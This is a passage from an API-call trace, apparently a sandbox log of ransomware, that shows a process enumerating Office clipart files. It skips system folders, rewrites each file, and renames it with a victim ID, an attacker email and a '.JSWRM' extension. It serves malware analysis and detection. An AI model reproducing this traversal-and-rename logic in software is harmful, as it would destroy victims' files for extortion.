ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01162_.WMF", cAlternateFileName="")) returned 1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2=".") returned 1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="..") returned 1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="...") returned 1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="windows") returned -1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="recovery") returned -1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="perflogs") returned -1 [0076.342] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="documents and settings") returned -1 [0076.343] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.343] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="system volume information") returned -1 [0076.343] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="msocache") returned -1 [0076.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01162_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01162_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01162_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01162_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01162_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01162_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.343] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2300) returned 1 [0076.343] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f0) returned 0x23fc98 [0076.343] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0076.345] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.345] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0076.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.345] CloseHandle (hObject=0x314) returned 1 [0076.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0076.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0076.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0076.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0076.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.346] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01163_.WMF", cAlternateFileName="")) returned 1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2=".") returned 1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="..") returned 1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="...") returned 1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="windows") returned -1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="recovery") returned -1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="perflogs") returned -1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="documents and settings") returned -1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.346] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="system volume information") returned -1 [0076.347] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="msocache") returned -1 [0076.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01163_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01163_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01163_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0076.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01163_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01163_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01163_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0076.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.347] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2300) returned 1 [0076.347] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f0) returned 0x23fc98 [0076.347] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0076.349] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.349] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0076.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.349] CloseHandle (hObject=0x314) returned 1 [0076.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0076.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0076.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0076.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0076.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0076.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.350] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0076.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.350] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01166_.WMF", cAlternateFileName="")) returned 1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2=".") returned 1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="..") returned 1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="...") returned 1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="windows") returned -1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="recovery") returned -1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="perflogs") returned -1 [0076.350] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="documents and settings") returned -1 [0076.351] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.351] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="system volume information") returned -1 [0076.351] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="msocache") returned -1 [0076.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01166_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01166_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01166_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01166_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01166_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01166_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0076.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.351] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2080) returned 1 [0076.351] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x23fc98 [0076.351] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0076.365] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.365] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0076.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.365] CloseHandle (hObject=0x314) returned 1 [0076.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0076.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0076.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0076.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0076.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0076.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0076.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.366] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01167_.WMF", cAlternateFileName="")) returned 1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2=".") returned 1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="..") returned 1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="...") returned 1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="windows") returned -1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="recovery") returned -1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="perflogs") returned -1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="documents and settings") returned -1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.366] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="system volume information") returned -1 [0076.367] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="msocache") returned -1 [0076.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0076.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01167_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01167_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01167_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0076.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.367] 